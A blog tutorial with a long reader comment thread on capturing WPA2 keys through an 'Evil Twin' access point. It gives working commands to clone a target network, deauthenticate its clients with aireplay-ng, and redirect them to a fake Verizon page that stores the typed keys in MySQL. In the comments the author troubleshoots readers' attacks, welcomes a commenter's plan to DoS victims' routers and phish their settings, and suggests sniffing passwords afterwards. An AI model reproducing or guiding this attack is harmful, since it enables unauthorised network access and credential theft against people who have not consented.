Hacking Wpa 2 Evil Twin Method

While that technique works, it could take an awful long time, especially when brute
forcing.
On this technique, named Evil Twin, we take a different perspective to the attack.
Using a powerful long range wireless card (Alfa AWUS036NH), we clone the target
network to confuse our victim. Then, we deauthenticate the victim from his own
wireless network and wait until he connects to our access point which looks exactly
like his.
When the victim connects, he is redirected to a service page asking for the WPA-2
key in order to access the internet. As soon as we get the key, you can either allow
the victim to use the network (maybe improvise some password sniffing?) or just
bring it down manually.
For this example I created a service page based on Verizon ISP. The files are placed at
the default location (/var/www/). I created a database called wpa2, which can be
done with the following commands:
Login to MySQL:
mysql -u root -p
Note: Default backtrack user/pass are root/toor

Create the database:
create database wpa2;
use wpa2;
create table content(key1 VARCHAR(64), key2 VARCHAR(64));
Finally, start apache and mysql services and check everything works, by going typing
localhost on a web-browser.
Commands:
Install dhcp3 and create config file:

apt-get install dhcp3-server -y
mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
gedit /etc/dhcp3/dhcpd.conf
/etc/dhcp3/dhcpd.conf:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}
Start clone access point:

airmon-ng start wlan0 [channel]
airbase-ng -e "AP name" -c [channel] mon0
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
/etc/init.d/dhcp3-server start
Flush iptables:
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface [internet connection]
-j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
Redirect traffic:
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [IP
address:80]
iptables -t nat -A POSTROUTING -j MASQUERADE
DeAuthenticate Access Point (poor):

aireplay-ng -0 0 -a [target bssid] [monitor interface]
DeAuthenticate Client (recommended):

aireplay-ng -0 0 -a [target bssid] -c [client mac] [monitor interface]
COMMENTS
113 comments
John (280 days)

Very professional video.
Would you consider uploading the index.html/php for us to modify? Or make a tutorial
on the code behind the service page?
REPLY
admin (280 days)

Hey John!
Thanks for the feedback. The post has been updated with the download link and
instructions. Hope it helps.
Take care.
REPLY
sickee (280 days)

Hi! For your Hacking WPA 2 Key Evil Twin Method (No Bruteforce) where did you
exactly place your template and is it ok if you could upload your example template.
Currently I am trying to implement the same method with airsnarf and I am having
serious issues with the dhcp on backtrack. Please help dude!
REPLY
admin (280 days)
Hey sickee!
I uploaded the post and added the download link. The files can be copied and
pasted on to the /var/www/ folder. Once thats done, start Apache and MySQL from
the services menu, and go type localhost to test it in a web browser.
Let me know how it goes, or contact me in IRC (freenode.net). Nick: deathcorps
Take care
REPLY
otlin (271 days)

Good day, we tried:
root@bt:~# mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 34
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)
Type help; or \h for help. Type \c to clear the current input statement.
after we tried to create table contents as below:
mysql> create table content(key1 VARCHAR(64), key2 VARCHAR(64));
and after appear this
ERROR 1046 (3D000): No database selected.
Could you explaine there are my mistakes.
Take care
REPLY
admin (271 days)
Hey otlin, the article has been updated. There were too commands prior to that
missing, which were:
use wpa2;
and finally:
Try that out and it should work.
Thanks for the feedback!
REPLY
darkey (270 days)

Hello sir
im a new user in Backtrack I would like to know if there is any way to crack a WPA2
without using Dictionarys?
i got handshake cable modem (HITRON) key lenth 12 chracters exp
( 40I3WQ893RCO ) and i cracked the capfile but passphrase not in the dictionary
please help me
i need 12 chracters exp ( 40I3WQ893RCO ) password list or how to crack this cap file
esyly please help me.. i am waiting the replay pease please..
REPLY
admin (270 days)

Im not understanding you completely..
This technique in the video DOESNT use a dictionary.
But if you have the cap file, then you HAVE to use either a dictionary, or a bruteforce.
I ran into this the other day, which has many wordlists:
http://g0tmi1k.blogspot.com/2011/06/dictionaries-wordlists.html
REPLY

otlin (270 days)
Good day,
thank for your prompt reply. I checked as you told and it worked. However I tried to
start your page as localhost on a web-browser, but it doesnt work. I had put all files
from folder verison to folder www. Apache and MySQL had been started before
working with web-browser, but I could see only this
It works!
This is the default web page for this server.
The web server software is running but no content has been added, yet..
And I have one more question, I am beginner in working with LINUX, and I ask, if
possible to create BASH script for automatic entering all commands which were
given by you. Please advise.
Take care
REPLY
admin (270 days)

Well, you extracted the folder too.
The files have to be exactly at /var/www/
Not at /var/www/verizon/
It is possible for me to make the bash script, however, this script would change
from version to version, so it would be too time consuming.
I much rather invest that time on learning new techniques =)
Why dont you take the initiative?
REPLY
otlin (270 days)

Hi, sorry again.
I extracted exactly at /var/www/ several times, but the result the same,
It works!
All the best
REPLY
admin (270 days)

Hey Otlin!
Try copying all the files inside of /var/www/verizon/ to the directory /var/www/
you should replace the index.html already there with the one from my template.
You pasted the files inside of the verizon folder, where they should just be in the
/var/www/
Hope it helps
REPLY
michel (270 days)

sorry for Inconvenience
Im again
i wach your vedio more then 5 times your idea is very great
Im not a pro hack or a programer im IT admin and i use a backtrack as a reguler
user.. i have an idea if you can help me because you are more profisional than me in
100 times ..
my idea is why we dont use your step but in deferent way
let we clone the WAP for vectimes by macking a simelar WAP in same name and
same range after we monitore and got the information about the victime
WAP(BSSID,mac.range)
then we must denil of service of vectim WAP and then force users to connect to our
fak WAP??? here is the puzzel
we must find tool or create a tool that will work togather with our access point to
retrive all the trafic from our access point to our database (mysql ,wpa2) or by
captiring the trafic inside our access point.
more explination (sorry my english not to strong):

as exampel
{we must kill the vectime WAP by sending 1000 of trafic to busy it from responding
to client and force the client to check his WAP . the client will note that there are two
access point with the same name, one of them with rear signal another with fulll
signal (our fak access point)}
1-our access point must also be secured with a key
2- client vectim must point to our wap and he will click connect
3- our access point will aske him to insert the wpa2 key
4- our access point will redirect key to our backtrack database
{ here we must find a way to capture all the trafic inside our fack WAP and to force it
redirect to the database or to capture what the victim client type for the key.
sorry again for Inconvenience and many thanks
awaiting your responce teacher
REPLY
admin (270 days)

Hey Michel!
You dont need to explain any further my friend!
That was actually my original idea however, I ran into trouble at the last step. I
couldnt find a way to retrieve the victims association key, since he isnt
associated yet.
The victim only gets an IP after being associated, so that makes our webserver
(apache) useless.
So the problem is we need a router that can either trick the user into thinking its a
WPA2 network or that simply records the keys.
Im also not sure if just sniffing the network would lead us in finding the key
If you have something to add or any other ideas, Im really interested in hearing
them.
Take care
REPLY
otlin (269 days)

Good day again,
Thanks a lot for your advice, Ive already started the localhost page , but could you
tell me from where or how you get the IP address 192.168.43.247 which you input in
firefox after the command iptables -t nat -A PREROUTING -p tcp dport 80 -j DNAT
to-destination [IP address:80].
Take care.
REPLY
admin (265 days)

Hey Otlin!
The IP address is my own internal IP, which I use as a webserver running apache.
After you start apache you should be able to access the website by typing your IP
address in the url of a browser.
To find your IP type: ifconfig
REPLY
darkey (265 days)

Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Type
help; or \h for help. Type \c to clear the current input statement.
mysql> use wpa2;
ERROR 1049 (42000): Unknown database wpa2
mysql>
=====
admin
why this error message come to my display can u explain to me please????
REPLY
admin (265 days)

You have to create the database first.
As the comment below mentions:
@darkey
first of all you have to create your database using :
Login to MySQL:
mysql -u root -p
use wpa2;
REPLY
Vpoint7 (247 days)

You do have some point here, evil twin considered an old time method, but pretty
much might work anyway. Ill give this a try, and might ask u later for any doubts.
REPLY
Unknown (265 days)

@darkey
first of all you have to create your database using :
Login to MySQL:
mysql -u root -p
use wpa2;
but my question for admin is:
im facing problems in watching video,how would i check the table to see
passwords ?
REPLY
admin (265 days)

Hey!
My suggestion is, as soon as you see a client has connected to the cloned network
(you can see this in the terminal where you brought the network up), stop
deauthenticating.
Then to check the table you have to log in to mysql.
Then: use wpa2;
Then: SELECT * FROM content;
Assuming you created the table with the commands I gave out and the client
entered the password, you should see the entries.
If you would like to test this, go to your browser after starting apache and try to
input a password and see if it saves it.
Take care :]
REPLY
darkey (263 days)

admin
sorry for the disturb how to create the database????

do u have any video about create the database ???
please help me
REPLY
darkey (263 days)

Enter password:
Welcome to the MySQL monitor.
Commands end with ; or \g.
Type
mysql> use wpa2;
Reading table information for completion of table and column names
You can turn off
this feature to get a quicker startup with -A
Database changed
mysql> select * from content;
Empty set (0.00 sec)
mysql>
sorry for the disturb how to create the database????
do u have any video about create the database ???
please help me
REPLY

admin (263 days)
@darkey
You have successfully created the database. However , youre database is still
empty. That means nobody entered a pass at the service page.
You can see this from the line: Empty set (0.00 sec)
Try accessing your page and enter a value yourself to make sure it works properly!
REPLY
darkey (262 days)

lot of thanks admin
===============================================
Try accessing your page and enter a value yourself to make sure it works properly!
===============================================
hoew to do accessing my page????
REPLY
admin (256 days)

Hey
To find your IP, open a terminal and type: ifconfig
Now, assuming you started apache & mysql, type your ip in a web browser, or just
locahost .
If you have placed the Service page in the correct directory you should see the
page, otherwise you will see the apache page saying It works!.
Hope it helps
REPLY
T!G3R (257 days)

Hello Admin,
First of all I want to thank you for this great video.
Secondly, I hope that you explain me this step :
gedit /etc/dhcp3/dhcpd.conf
/etc/dhcp3/dhcpd.conf:
subnet 192.168.2.128 netmask 255.255.255.128 {
range 192.168.2.130 192.168.2.140
}
I want to know if I should copy and past all this lines without any changes or I need to
change some IP adress.
Finally, thank you in advance.
Bye Bye
REPLY
admin (257 days)

Hey T!G3R!
You should copy everything starting at the line: ddns
If you look at the lines you will see this is a network model.
It tells you the range of internal IPs to use, allocated addresses, etc.
In my house I use the range: 192.168.1.0/24
Because of that, I decided to use the 192.168.2.0/24 range for this.
Notice that if your home network uses the same range, it can cause confusion with
your devices.
If you would like to know more, google Subnetting.
Thanks for the feedback =)
REPLY
Rafael (152 days)

Hello, I love your work congratulations.
Only a doubt, my local ip is 192.168.1.1/24
I use the same settings that you use the video?
Since the machines IP is 192.168.1.5 BT5
REPLY
spartacratus (256 days)

hi !!!
great tuto . ive a problem .ill do all steps and the fake webpage appears , and i want
to try it so i put password and after i start mysql
Enter password:
Type
mysql> use wpa2;
You can turn off
Database changed
mysql>
i type the password but in nothin appears plz help me
im algerian sorry my english is not strong
help me teacher
REPLY
admin (256 days)

Hey @Spartacratus !
So youre saying you see the service page, type the password but it doesnt send it
to the mysql database?
After you type the password you should get a message saying Saving Settings,
just like in the video.
If youre still getting Empty set on mysql, that means its not saving the password.
Why dont you send me a screenshot of whats going on to my email, and I can
further help you.
TechnicDynamic@gmail.com
REPLY
spartacratus (255 days)

ok
REPLY
redpen (254 days)

hello admin,
I followed all the steps and entered all the commands. I have created the database
and downloaded the template and placed the files in the var/www folder. I installed
the dhcp server and copied the setting in the new config file. I started the fake clone
access point and flushed the tables and redirected the traffic. When I tried to access
the fake web page from my own machine it worked. I were able to connect to the
fake access point from the test target client machine. However when I tried to access
the fake web page from the test target client machine I got web page can not be find
as when you are not connected to internet.
REPLY
Rehan (254 days)

This command doesnt work to me
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
REPLY
sparta (253 days)

hi !!!
im kamel from algeria i want to know how can i connect to a hidden network
so,
1- the ssid of the network isnt hidden it is gaamex-direction
2-when i tape airodump-ng mon0 this network appears and it is unsecured
3- but when i go to windows xp and i scan the networks i dont find it so i click on
hidden essid and i tape gaamex-direction but a window pop up said the network
exist but i cant conect
4-in backtrack wicdnetwoork manager i cant find it
can u help me how can i connect to it ?
REPLY
Jack (251 days)
hey , thanks admin , but i have only one question ..

when i open my browser to check the page status ..http:ipaddress and then inter ,
this what page say It works!
The web server software is running but no content has been added, yet.
and we must type http:ipaddress/index.html to check it
now what will happen when the victiom open my page will he get http://ipaddress
only or he will get ipaddress/index ??? pls reply
REPLY
admin (245 days)

You have placed the website in the wrong place.
The files should DIRECTLY at:
/var/www/
Meaning that the index.html should be:
/var/www/index.html
Im assuming you can access the files by typing:
http://ip_address/verizon/
Have you included the folder as well?
Just paste the files, not the folder.
REPLY
Dohn Joe (245 days)

Looks like the Evil Twin Method(TM) will have to be shelved for a while. Check out the
latest WPS vulnerability on Dan Kaminskys blog:
http://dankaminsky.com/2012/01/26/wps2/
REPLY

admin (245 days)
As much as I would love to agree, this isnt true.
I have tried version 1.0 with bad results. Turns out one of the biggest providers in
US (verizon) uses routers deactivated WPS by default.
Furthermore, large enterprise networks will never have WPS enabled, which makes
evil twin method perfect for the scenario.
Besides that, I really liked the concept of reaver and am looking forward to try it
again! Just waiting for a stable release.
Hopefully a stable version will come out before the router manufacturers patch an
update to disable WPS by default.
REPLY
darkness (241 days)

subnet 192.168.2.128 netmask 255.255.255.128 {
range 192.168.2.130 192.168.2.140
}
what do you specify in accordance with this section?
REPLY
admin (234 days)
This will create the specifications for the network.

For example, the last line says range 192.168.2.130 192.168.2.140 that means
we are going to have a max. of 10 clients able to connect to this network. If you
wanted to allow 20, you would change the 140 to 150.
All the lines are self-explanatory if you have some knowledge in networking! =)
REPLY
John (241 days)

Very nice technique. Its probably very common for basic users to enter WPA2 key in
the prompt but is it also a default Verizon AP authentication method? Its probable a
more tech savvy user will expect to see the AP-login password as most after market
routers do when you try to login. The problem is, how to know the router password? I
have an idea and Ill throw you a ball:
1. DoS the target AP -> wait for it to disappear on airodump (use quick refresh
option), (user resets his device, most common way to do fault diagnostics), spoof
your client MAC and connect to the AP. Login and recon info: site appearance, AP
model, IPs, etc. Works rather well because in many cases the routers default wireless
is open and up by default.
2. Rebuild the entire router configuration site to look identical and make the WPA2
setup page connect to MySQL.
3. DoS once more -> When victim resets his AP, put up evil twin server with almost
identical MAC-addr. (If airbase could just ignore the deauth packets sent to its MACaddr. you could even use the same one.)
4. User expects his router to pop up in windows with its default values and makes a
mistake and connects and configures the evil twin (could even affect airbasesettings). The set WPA2 password is recorded and settings take effect immediately. If
the target MAC is behind the same NAT not even the external IP will appear different,
user cant tell who it is connecting to. The key is collected. Suddenly, the problem
reoccurs (attacker DoSs his airbase), the router crashes. User makes another reset
and this time it seems to work (what was the matter with it?)
5. Attacker hopes user will configure the same password for his own AP and many
times he does because Its less complicated than setting a new passphrase for all
wireless devices.
REPLY

admin (226 days)
Oh boy, this sounds insanely ingenious!
Just how I like it!
Any chance you can send this to my email at technicdynamic@gmail.com ?
If you could specify the purpose on each step also, that would be awesome Im
looking into developing a part two of this tutorial.
Even though we have Reaver now (if you noticed, my video came out slightly
before reaver was publicly released), Im sure all the hackers like to have an extra
card up their sleeve.
Take care John!
REPLY
sergio (239 days)

lot of thanks admin for the video
but i have a problem
root@bt:~# ifconfig at0 up
root@bt:~# ifconfig at0 192.168.2.129 netmask 255.255.255.128
root@bt:~# route add -net 192.168.2.128 netmask 255.255.255.128 gw
192.168.2.129
root@bt:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid
at0
Internet Systems Consortium DHCP Server V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
/etc/dhcp3/dhcpd.conf line 10: semicolon expected.
}
^
/etc/dhcp3/dhcpd.conf line 10: unexpected end of file
}
^
Configuration file errors encountered exiting
root@bt:~#
*i have installed the dhcp3-server but i dont find him in /var/run/
can u help me?
REPLY
Boody (232 days)

hi, so when you enter this : ddns-update-style ad-hoc;
subnet 192.168.2.128 netmask 255.255.255.128 {
range 192.168.2.130 192.168.2.140
}
you get the error i got that too, just add a semi-column to the end of the line:
range 192.168.2.130 192.168.2.140; <<like this
and it will work, good luck
REPLY
Bad Biddy (231 days)

I get this same error. Have you figured it out?
REPLY
admin (231 days)

Yes, sorry about that!
It was a typo on my fault, I missed a semi-colon at line 10, like the error says.
You can just insert a semi-colon (;) at line 10 or copy and paste from the website
into the dhcpd.conf file since it is now updated.
This is the line in question, it was like this:
range 192.168.2.130 192.168.2.140
Should be like this:
range 192.168.2.130 192.168.2.140;
Thank you!
REPLY
kira (235 days)

hello
question ;
for the :
subnet 192.168.2.128 netmask 255.255.255.128 {
its general or must change it ?
because IPs on my network are like 192.168.1.15 .
thank you
REPLY
admin (231 days)

Is the subnet mask on your network 255.255.255.0 ?
If it is, then yes.
The only thing you cant have is two IPs on the same subnet.
Suppose your IP was 192.168.2.15 and you tried to create this network, then you
would have a problem.
REPLY
Bad Biddy (232 days)

Im getting this error code for some reason
root@bt:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid
wlan0
Internet Systems Consortium DHCP Server V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
/etc/dhcp3/dhcpd.conf line 10: semicolon expected.
}
^
/etc/dhcp3/dhcpd.conf line 10: unexpected end of file
^
Configuration file errors encountered exiting
REPLY
admin (231 days)

Yes, sorry about that!!!
It was a typo on my fault, I missed a semi-colon at line 10, like the error says.
You can just insert a semi-colon (;) at line 10 or copy and paste from the website
into the dhcpd.conf file since it is now updated.
This is the line in question, it was like this:
range 192.168.2.130 192.168.2.140
Should be like this:
range 192.168.2.130 192.168.2.140;
Thank you!
REPLY

Boody (232 days)
Hi Admin,
First of all, i would like to thank you alot for this great video!! then, i have a question,
everything went great and working, but when i connect with my other laptop to the
cloned network i get connection but limited or no connectivity so when i try to visit
any website it doesnt redirect me to verizon page, it just gives me server not found,
is there a solution for this?
And one more question what is that that you posted at the bottom of the page where
to use it You may use these HTML tags and attributes:
REPLY
admin (231 days)

Hey Boody!
What we are trying to do is bridge the connection in Linux, so you are connected to
internet in lets say wlan0 interface you want to bridge it to at0, as you can see in
this line of code:
iptables table nat append POSTROUTING out-interface [internet connection] -j
MASQUERADE
The out-interface should be where youre connected to the internet, in my case I
used two wireless cards, so I used the wlan interface. If you were connected on
eth0 for example, you would type eth0 in there.
I usually use my Android phone to create a hotspot and share that connection
Oh, and the You may use these HTML tags is for the comments on the website
and not part of the tutorial or commands section.
Hope I helped in some way and if you still have the problem, let me know. Im
thinking of working on a forum due to the amount of questions, I know it gets hard
to even find my reply since theres so many comments.
Take care boody
REPLY
Blood (228 days)

Hi, ive a problem to redirect to verizon page by target laptop. Why? I have Broadcom
BCM4312 internal wifi card for run the attack. Is it work?
REPLY
admin (226 days)

Hey Blood!
What problem specifically are you having? I cant tell if it works or not, but you can
always try it yourself!
Start up Backtrack, and once it loads, issue the command:
ifconfig
If you see a wireless interface (such as wlan0, etc.), it works!
Issue wicd and try connecting to the network properly.
Notice this isnt the easiest of methods some knowledge will come in handy for it.
Take care, and good luck!
REPLY
DONZ (228 days)

hey. I have the verizon files in /var/www . the files are not in the verizon folder so im
wondering why i get the It Works page still in the browser. any help?
REPLY
admin (226 days)

Have you replaced the index.html file with the one in the verizon folder?
That is the file that is looked up whenever someone access the server.
REPLY
George (227 days)

Hi Admin!
I have a question.. First of all many thanks for this great video.. Well my problem is
that i makethe fake AP and i managed the connections fine, so when i connect to the
fake AP i can access the webpage that we created but the problem is that is taking
too much time, about 4 5 mins. Any help?
REPLY
admin (226 days)

Hey George!
The issue seems to be the wireless card used to create the fake AP. Perhaps the
card itself isnt powerful?
For the video and all my lab work, I use only Alfa wireless cards because they
provide great range and power awus036nh to be specific.
Also, what is your internet connection from the ISP?
Here in the USA, I get around 10mb, which is plenty and loads up mosts pages
rather fast.
If you think there might be something wrong going on, and have some networking
experience, I recommend downloading Wireshark it lets you analyze network
packets.
You might find that something else is happening with the packets, maybe their
being sent somewhere where their not supposed to be sent?
Give it a try and let us know!
Take care buddy!
REPLY
doctorK (226 days)

Hi admin
tnk for the video..very nice!
ive a problem..i cant connect the client to the fake AP
i tried to set in the client no encrypt for the connection but is the same
i dont know i can i do
its also interesting the johns post
can anybody make a video about that??
bye
REPLY
admin (226 days)

Hey buddy doctorK!
Do you see the fake access point broadcasting at least? Can you see it in your list
of wireless networks?
The network should be open, that means it has no encryption, so your actions
seem right. Does it have low signal by any chance?
Make sure to issue a ifconfig command and see if you have IPs in different
subnets, because you cant have two IPs on the 192.168.2.* range.
Take care!
REPLY

doctorK (226 days)
tnx for replay admin
yes i can see the fake AP whit the client but i cant connect it
ive a good signal
what about ifconfig
i made everything that you sed in the tutorial
bye
REPLY
Braun (225 days)

Hi admin, i have a problem with ip address. How you get the IP address
192.168.43.247 which you input after the command iptables -t nat -A PREROUTING
-p tcp dport 80 -j DNAT to-destination [IP address:80]. How i get my ip address? I
dont know!. Probably i have to configure the server apache. but how i do? Please,
help me. thank you
REPLY
Braun (225 days)

How to configure /etc/apache2/httpd.conf and /etc/hosts ?
REPLY
admin (209 days)

Hey Braun!
This is how it works:
We have two interfaces right, one is connected to the internet and the other one is
the wireless interface used to create the access point.
So lets say youre connected to the internet via cable (eth0). In that case you issue
the command ifconfig and look over there, you should see your IP address.
Starting apache is easy, already comes pre-installed in Backtrack.
Go to the menu:
Backtrack > Services > HTTP
Hope it helps!
REPLY
Ali (225 days)

Hey Bro , First of all i wanted to thank you for this Great mind you have
smart method to use
, its really
, which i liked too much and really thanks for sharing , but bro
i have one little problem which is really wierd , i DID everything perfectly and i got it
without any errors but when i try to connect to my new access point , which is
unsecured using another pc i cant connect to it , i get a unable to connect to AP ,
so what do you think the problem is is it from my Wireless device , iam not sure , i
have Atheros AR9170 which is supported with aircrack suite , but i saw in ur video u
use 2 interfaces while setting some options u used wlan0 and next time wlan2 , but i
only have one interface which i used in the two settings which is wlan0 , just watned
to mention that so u can help me
reading my problem
Ali.
REPLY
admin (209 days)

Hey Ali!
Hows it going?
, thank you sooo much again for sharing and
The reason I use two interfaces is because after obtaining the key we can usually
make good use of the created access point to implement password sniffing and
such without need of arp poisoning.
Is there no other way you can use an interface for internet? I have a rooted android
that I create access point for internet. You can always use eth0 as well.
Take care
REPLY
Wle.INC (221 days)

Hey man, great tut!
I too get It works This is the default..
I dunno why, I HAVE placed contents of Verizon folder to /var/www.
I have edited httpd.conf file (DirectoryIndex /var/www/index.html etc), but nothings
seems to work.
Please help!
Best wishes,
w
REPLY
admin (209 days)

Hey!
Have you replaced the index.html at /var/www ?
I dont understand why this is happening to be honest have you accessed it from
your own browser?
Start apache then try opening firefox, type on the url localhost
See if you still get the It works! even after replaced.
Take care
REPLY

austin316 (209 days)
can you please tell me where this came from 00:12:23:34:45:56
if we dont use -a option then the clone network will automatically use the MAC of the
interface that is on mon0
one more question ,what IP should i use , where exatly yours came from?
REPLY
admin (209 days)

Hey Austin!
You got it pretty much! If you dont specify anything it uses the MAC address of the
monitor interface.
The IP comes from wlan2, where I am connected to the internet via a rooted
Android used to create a hotspot, there I run apache.
Then I use interface wlan0 to issue the monitor interface, which I use to create the
access point.
Hope it helped! Take care.
REPLY
austin316 (208 days)

thanks alot i appreiate it,
should i edit the /etc/dhcp3/dhcpd.conf: according to the wlan settings that im
connected to internet with?i mean subnet mask etc.
last question but not least
how to delete or remove a clone network?
REPLY

admin (207 days)
The /etc/dhcp3/dhcpd.conf should actually be different than your wlan settings,
just copy and paste from article above.
Double check on your wlan interface just to make sure it doesnt interfere with the
192.168.2.0/24 subnet.
To delete the network you just bring airbase down. On the terminal where you
opened it, just hold ctrl and press c and you wont see it in wireless aps
anymore.
Take care
REPLY
anemos (205 days)

well i got to the step i deauthenticated the AP s client(thats myself so to test) but
when i stop the attack in order to get connected again no verizon site appears to
get the keywhat am i missing?should it be a second device connected to get it
right?mysql & apache works fine..thanks!
REPLY
lars (193 days)

Will this work if i try it on a WPA2-PSK protected network??
REPLY
admin (187 days)

Yes! This is actually meant for WPA / WPA 2
REPLY

Max (183 days)
iptables -t nat -A PREROUTING -p tcp dport 80 -j DNAT to-destination [IP
address:80]
am in college wifi and i dont know what ip address to be entered please help.
REPLY
admin (183 days)

Thats the IP address of the interface on your computer where you are connected.
Type:
ifconfig [interface]
In the video I used wlan2, so e.g. ifconfig wlan2
If you are connected, it will tell you the IP of that interface.
REPLY
redness (180 days)

Hi guys everything went smoothly exetp fot this part plis assist
mysql>
REPLY
johny (179 days)

This method is a TOTAL fake, like most of them cracking WPA for example dictionary
attack.The little kids put their password in the first line on the dictionary file and
BOOM , WPA cracked in 1 sec. LMAO all the time.
Here is why this method will never work.The client has stored a profile connecting to
that WPA encrypted wi-fi network.IT IS ENCRYPTED.its is not a open network.SO
whenever the client tries to communicate with the AP all of its DATA packets will be
encrypted.So you are setting up EVIL TWIN that can not decode the encrypted data
packets of the client, because you do not know the WPA key.So the client will drop the
connection.
Practically client can only authenticate and associate with your evil twin AP.It will not
be able to communicate with it.
That method would work only if the AP has no encryption.Client will send DATA
packets unencrypted and it will be able to communicate with the AP showing it up
the captive web page portal.
REPLY
admin (177 days)

Hey John!
I do enjoy an argument, but you lack research on your comment so no argument
needed.
First, I would like to say that I posted this method on a few different forums, all of
which it got many comments and feedback from security enthusiasts.
For my surprise actually a lot of people said they had been using this method for a
while (seen on bt forums) and even contributed their own tips into it!
Now to simply explain the method to you: using airbase-ng we are capable of
deauthenticating the victim and have him connect back to our network instead of
his, thanks to the Accept all probes option. Of course, you will need decent gear
for this.
From there, we social engineer the victim (he thinks he is in his own network) by
redirecting to a page with the password, or perhaps a router update, etc.
REPLY
R3V0LV3R (177 days)
i have a problem redirecting the traffic i dont get the verzion that
i downloaded it because when i try connecting with it it says limited access and i dont
get redirect to the apache server
btw how do i know the ip that i want to redirect the traffic to?
you just put na random number without telling us how you choose it?
REPLY
WPA/WPA2 Hacking Tanpa Wordlist/Bruteforce Red Devils Penetration Testing

(172 days)
[...] : http://technicdynamic.com/2011/12/hacking-wpa-2-key-evil-twin-no-bruteforce/
Share this:TwitterFacebookLike this:LikeBe the first to like this [...]
REPLY
rico (168 days)

hello sir.
could you help me about this error?
Enter password:
ERROR 2002 (HY000): Cant connect to local MySQL server through socket
/var/run/mysqld/mysqld.sock (2)
thank you in advance.
REPLY
cristy (158 days)

you have to start mysql service type in terminal this comand: /etc/init.d/mysql start
and hit enter after login in mysql with password: toor
REPLY
NightCoder (155 days)

great bro I hope you show us the same way on windows
REPLY
matt (152 days)

Hi
Can anybody help me out, what should my config file look like if my default gate way
on my router is 192.168.1.1.
Thanks
REPLY
admin (150 days)

You can use the same config in the command section!
Save it in the same location: /etc/dhcp3/dhcpd.conf
Good luck!
REPLY
Me (150 days)
Yeah, but why not take a weaker encryption algorithm like web or one of the many
many wpa2 variants (including wpa radius and wpa md5) as fake access point and let
the user enter their password the NORMAL WAY and crack the encrypted but weaker
encrypted than wpa2 aes password, that you will get back from the client when he
tries to enter his password the *normal* way.
REPLY
admin (150 days)

I see what your saying and I like the idea we could then use the many password
websites (md5decrypter, etc.) to query the hashes? Or would they still be salted?
I did improve this method a bit by using airbase instead of the manual config and
other details as the post is almost a year old.
But will take a look into creating the md5 access point.
REPLY
arminaven (148 days)

hi !!
i was tried this methode one 30 days, but until now i unsucces, my problem is, when i
finished this methode, when victim klick my fake AP, cannt acces, and then no
result , but when i type my IP (192.168.1.16) at browser victim, the fake AP worked, n
when victym type the password, password stored on my database, this can run if the
victim type my IP, so i think my problem is in ddns-update-style ad-hoc;, information
of my IP is like this:
IP: 192.168.1.16
255.255.255.0
do i must modify the ddns-update-style ad-hoc; couse my ip 192.168.1.16?
please help me
sorry about my english
thanks about your attention
REPLY
admin (127 days)

Hey arminaven!
After many comments and suggestions (almost 100 comments only on this page!),
and a lot of people having issues, I decided to make a script to automate this
I know Im not answering your specific question and Im sorry.
Hopefully it will help you understand it better once you see how the script works.
Expect it before end of the month! =)
Cheers!
REPLY

matt (147 days)
I have the same problem arminaven, everything seems to be working ok, when i type
localhost in the attacker computer everything works great.When i try to connect to
the AP with the victems computer, its doesnt let me connect. ANybody got any
ideas???
Thanks
REPLY
admin (127 days)

Hey matt!
Cheers!
REPLY
NightCoder (145 days)

back
like arminaven says me too in the computer victim i can connect to Fake AP
but i cant see my page i see it just if i type my ip(192.168.135.127)
any help guys
REPLY
admin (127 days)

Hey NightCoder!
Cheers!
REPLY
bud (127 days)

Hi admin.
I have read all the posts here but isn`t clear for me.
What i want to ask is this and if you time to help.
1. Victim AP is a Cisco modem router
2. do i need to find its ip address, and how ?
3. how can i find its isp ?
4. Assuming that I founded all information required for this ap can you rewrite all the
comands with required adjustments using my actually ip of my ap which is
192.168.1.5
5. How can be compiled a different web page asking for wpa2 verify ? In this case we
need a fake Cisco web page, which its default ip founed on internet is 198.133.219.25
(i pinged from my cmd.exe the cisco.com)
REPLY
admin (127 days)

Hey bud!
2) IP address is not needed, since the victim is trapped inside evil twin network.
3) ISP isnt needed per se but it is good practice to save the victim BSSID on a
MAC address it works like this [XX:XX:XX] the first 3 pairs represent the company
so if you know the company it becomes easier to guess the ISP (only verizon uses
that router model for example) the last 3 pairs represent model.
Im gonna skip to this:
Cheers!
REPLY
vahid (126 days)

hi
thanks for your nice work.
First of all, please accept my excuse for poor English writing .
i wanted to share the following idea :
as we know every access point (ap) is broadcasting beacon . This beacon contains all
the information about that access point. when a station wants to join to a access
point it first sends probe request (although it can still silent and wait for the next
beacon). access points are designed to respond to probe request packet with a probe
respond. probe respond contains the same information as in the beacon. what we can
do is this : in the fake aps beacon copy exactly the same information as in victim ap
but at the probe respond reveal that the ap is open.
as you know, windows 7 and vista are designed such that at background they search
for the beacons and whenever they find an other access point with the identical
name and identical security configuration they try to atumaticaly connect to that and
as the first step they send probe request to the founded ap.
in this way they will be no need for deauth of clients and clients would not see the
